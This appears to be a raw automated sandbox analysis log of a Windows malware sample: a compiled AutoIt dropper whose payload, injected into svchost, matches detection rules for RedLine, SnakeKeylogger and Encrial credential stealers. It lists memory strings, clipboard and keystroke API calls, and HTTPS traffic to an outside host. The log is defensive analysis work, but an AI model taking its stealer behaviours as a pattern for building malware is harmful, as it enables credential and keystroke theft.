                  Source: svchost.exe, 00000003.00000002.4524898032.0000000005390000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.000000000534A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.000000000525F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005287000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.000000000521A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: svchost.exe, 00000006.00000002.4525232764.000000000534E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: svchost.exe, 00000003.00000002.4524898032.000000000546D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/hZ
                  Source: svchost.exe, 00000003.00000002.4524898032.0000000005477000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005349000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49722 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49812 version: TLS 1.2
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E36B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00E36B0C
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E36D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00E36D07
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D76D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00D76D07
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E36B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00E36B0C
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E22B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00E22B37
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E4F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00E4F7FF
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D8F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00D8F7FF

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.3.svchost.exe.305ef20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.3.svchost.exe.305ef20.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.3.svchost.exe.305ef20.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.3.svchost.exe.305e000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.3.svchost.exe.305e000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.3.svchost.exe.305e000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.demonetised.exe.3a90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 6.2.svchost.exe.7740000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.svchost.exe.7740000.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.svchost.exe.7740000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.2.svchost.exe.7970000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.svchost.exe.7970000.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.svchost.exe.7970000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.3.svchost.exe.305d000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.3.svchost.exe.305d000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.3.svchost.exe.305d000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 2.2.demonetised.exe.1290000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.3.svchost.exe.305e000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.3.svchost.exe.305e000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.3.svchost.exe.305e000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.3.svchost.exe.305d000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.3.svchost.exe.305d000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.3.svchost.exe.305d000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.svchost.exe.7740000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.svchost.exe.7740000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.svchost.exe.7740000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.2.svchost.exe.7970f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.svchost.exe.7970f20.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.svchost.exe.7970f20.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.2.svchost.exe.7970000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.svchost.exe.7970000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.svchost.exe.7970000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 3.2.svchost.exe.7c40000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.svchost.exe.7c40000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.svchost.exe.7c40000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.svchost.exe.7740f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.svchost.exe.7740f20.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.svchost.exe.7740f20.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.3.svchost.exe.305df20.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.3.svchost.exe.305df20.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.3.svchost.exe.305df20.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.3.svchost.exe.305ef20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.3.svchost.exe.305ef20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.3.svchost.exe.305ef20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.svchost.exe.7740f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.svchost.exe.7740f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.svchost.exe.7740f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000003.00000002.4522422465.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000006.00000002.4522419092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000005.00000002.2206920824.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000002.00000002.2089442641.0000000001290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: Process Memory Space: svchost.exe PID: 2684, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: svchost.exe PID: 6572, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Binary is likely a compiled AutoIt script file
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: This is a third-party compiled AutoIt script.0_2_00DE3D19
                  Source: B7N48hmO78.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: B7N48hmO78.exe, 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_9bae0d3b-b
                  Source: B7N48hmO78.exe, 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a54ca064-8
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: This is a third-party compiled AutoIt script.2_2_00D23D19
                  Source: demonetised.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: demonetised.exe, 00000002.00000002.2088550443.0000000000DCE000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_84e33f3b-3
                  Source: demonetised.exe, 00000002.00000002.2088550443.0000000000DCE000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f4f5c117-b
                  Source: demonetised.exe, 00000005.00000002.2206090507.0000000000DCE000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_27c54d59-c
                  Source: demonetised.exe, 00000005.00000002.2206090507.0000000000DCE000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5f7070d2-0
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DE3742 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_00DE3742
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E500AF NtdllDialogWndProc_W,0_2_00E500AF
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E50133 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,0_2_00E50133
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E5044C NtdllDialogWndProc_W,0_2_00E5044C
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E4E9AF NtdllDialogWndProc_W,CallWindowProcW,0_2_00E4E9AF
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DFAAFC NtdllDialogWndProc_W,0_2_00DFAAFC
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DFAB4F NtdllDialogWndProc_W,0_2_00DFAB4F
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E4ECD4 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_00E4ECD4
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E4EC7C NtdllDialogWndProc_W,0_2_00E4EC7C
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E4EEEB PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_00E4EEEB
